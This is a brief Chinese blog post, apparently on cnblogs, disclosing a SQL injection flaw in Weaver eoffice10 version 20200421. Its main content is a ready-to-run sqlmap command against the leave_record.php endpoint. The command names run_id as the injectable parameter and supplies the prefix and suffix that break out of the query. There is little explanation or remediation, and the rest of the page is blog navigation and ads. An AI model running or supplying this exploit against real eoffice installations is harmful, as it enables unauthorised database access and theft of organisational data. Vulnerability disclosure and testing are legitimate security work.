泛微eoffice10-20200421注入漏洞

漏洞存在的版本： V10.0-20200421 漏洞验证：注入点位置： python sqlmap.py -u "http://127.0.0.1:8010/eoffice10/server/ext/system_support/leave_record.php?flow_id=1&run_id=1&table_field=1&table_field_name=user()&max_rows=10" --prefix="') " --suffix="%23" -p run_id

posted @ 2022-05-15 16:19 Creator、创造者阅读(1152) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

【推荐】还在用 ECharts 开发大屏？试试这款永久免费的开源 BI 工具！
【推荐】国内首个AI IDE，深度理解中文开发场景，立即下载体验Trae
【推荐】编程新体验，更懂你的AI，立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包，你的智能百科全书，全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell：AI 加持，快人一步

相关博文：

· django 使用ORM插入数据,提示Cannot assign "1": "UserInfo.ut" must be a "UserType" instance.

· django导入自定义包出现 no module name “XXXXX”问题笔记

· 泛微E-Office flow_xml.php SQL注入漏洞

· 泛微E-Office init.php SQL注入漏洞

· 泛微E-Office json_common.php文件存在sql注入漏洞

阅读排行：
· 地球OL攻略 —— 某应届生求职总结
· 周边上新：园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源！
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】

公告

昵称： Creator、创造者
园龄： 4年3个月
粉丝： 1
关注： 0

<

2025年3月

>

日

一

二

三

四

五

六

23

24

25

26

27

28

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

1

2

3

4

5

随笔档案

文章分类

CTF(1)

阅读排行榜